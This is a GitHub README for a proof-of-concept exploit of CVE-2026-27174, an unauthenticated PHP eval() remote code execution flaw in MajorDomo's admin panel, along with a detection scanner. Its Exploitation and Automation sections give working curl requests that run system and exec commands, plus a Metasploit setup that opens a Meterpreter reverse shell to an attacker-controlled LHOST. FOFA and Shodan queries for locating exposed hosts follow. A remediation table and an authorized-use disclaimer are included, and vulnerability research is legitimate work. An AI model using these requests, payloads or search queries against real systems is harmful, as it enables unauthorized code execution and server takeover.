Skip to content

MaxMnMl/majordomo-CVE-2026-27174-poc

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
README.md
README.md
 
 
scan.py
scan.py
 
 

Repository files navigation

majordomo-CVE-2026-27174-poc

A proof-of-concept exploiting an unauthenticated remote code execution via the admin panel's PHP console feature in MajorDomo (Major Domestic Module).

Vulnerability

MajorDoMo's admin panel exposes a PHP evaluation console via /admin.php. Due to a missing exit after an authentication redirect in panel.class.php, the AJAX handler inc_panel_ajax.php is included unconditionally — making its eval() reachable by any unauthenticated HTTP request.

An attacker can execute arbitrary PHP code with a single GET request, requiring no credentials, no prior access, and no interaction from the victim.

Affected Versions

  • All MajorDomo versions prior to the patch of February 18, 2026.

Detection Scanner

scan.py is a non-destructive multi-threaded scanner that detects hosts vulnerable to CVE-2026-27174 without executing any harmful payload.

How it works

The scanner operates in three sequential phases per target:

Phase 1 — RCE Confirmation
  └─ Sends: echo 'random_marker';
  └─ Checks: marker is reflected in the response body
  └─ Confirms: eval() is reachable without authentication

Phase 2 — PHP Sandbox Profiling
  └─ Sends: echo 'marker:' . ini_get('disable_functions');
  └─ Extracts: list of disabled PHP functions on the server

Phase 3 — OS Execution Surface
  └─ Probes: system, exec, shell_exec, passthru via function_exists()
  └─ Classifies: impact level as HIGH or MEDIUM

A random alphanumeric marker is generated per request to avoid false positives from caching, WAFs, or response pollution.

Usage

Requirements

pip install requests

1. Prepare a targets file

Create a targets.txt file with one IP:PORT per line:

192.168.1.10:8080
10.0.0.5:80
10.0.0.12:443
# lines starting with # are ignored
# only IP:PORT format is accepted

2. Run the scanner

python3 scan.py targets.txt

Output

[+] RCE PHP CONFIRMED -> http://192.168.1.10:8080/admin.php
[-] Not vulnerable -> 10.0.0.5:80

[+] Vulnerable targets exported to results.json

results.json

Automatically generated when at least one vulnerable host is found:

[
    {
        "target": "192.168.1.10:8080",
        "url": "http://192.168.1.10:8080/admin.php",
        "rce_php": true,
        "disable_functions": "popen,pclose,proc_open",
        "system_functions_available": ["system", "exec"],
        "impact_level": "HIGH"
    }
]
Field Description
target Scanned IP:PORT
url Full URL where RCE was confirmed
rce_php PHP code execution confirmed (always true in results)
disable_functions Server's disable_functions PHP setting (null if empty)
system_functions_available OS execution functions callable by an attacker
impact_level HIGH (OS exec reachable) or MEDIUM (PHP RCE only)

Exploitation

Based on the result of the system_functions_available field in the result.json file, we can craft a GET request using the system function(s) to exploit the RCE:

curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+exec('id');
#or
curl http://192.168.1.10:8080/admin.php?ajax_panel=1&op=console&command=echo+system('id');

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Automation

Metasploit Module:

msfconsole
use exploit/multi/http/majordomo_console_eval_rce
set RHOSTS 192.168.1.10
set RPORT 8080
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 172.17.0.1
check #Verify it returns Vulnerable
run #Verify a Meterpreter session opens as www-data

Into the wild

FOFA:

title="MajorDomoSL"

SHODAN:

http.title:"MajorDomoSL"

Impact

A remote unauthenticated attacker can:

  • Execute arbitrary PHP code on the server
  • Read sensitive files (/etc/passwd, configuration files, credentials)
  • Write PHP webshells for persistent access
  • Pivot to OS-level command execution if PHP functions system, exec, shell_exec, or passthru are not disabled

The effective impact depends on the server's disable_functions PHP configuration:

Scenario Impact Level Description
No disable_functions CRITICAL Full OS command execution
Partial restrictions HIGH PHP RCE + partial OS exec
disable_functions blocks all exec MEDIUM PHP RCE only (file read/write, data exfiltration)

CVSS 4.0 - 9.3 CRITICAL — CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

CVSS 3.1 - 9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Remediation & Mitigation

Update to the latest version of MajorDomo (Major Domestic Module).

Control Prevents RCE Prevents OS Exec
Apply feb,18,2026 patch
Firewall/IP allowlist on /admin.php
disable_functions hardening

References

https://chocapikk.com/posts/2026/majordomo-revisited

https://nvd.nist.gov/vuln/detail/CVE-2026-27174

sergejey/majordomo#1177

Disclaimer

This tool is for authorized security testing only. Unauthorized access to computer systems is illegal.

About

CVE-2026-27174 - An unauthenticated remote code execution via the admin panel's PHP console feature

Resources

Readme
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages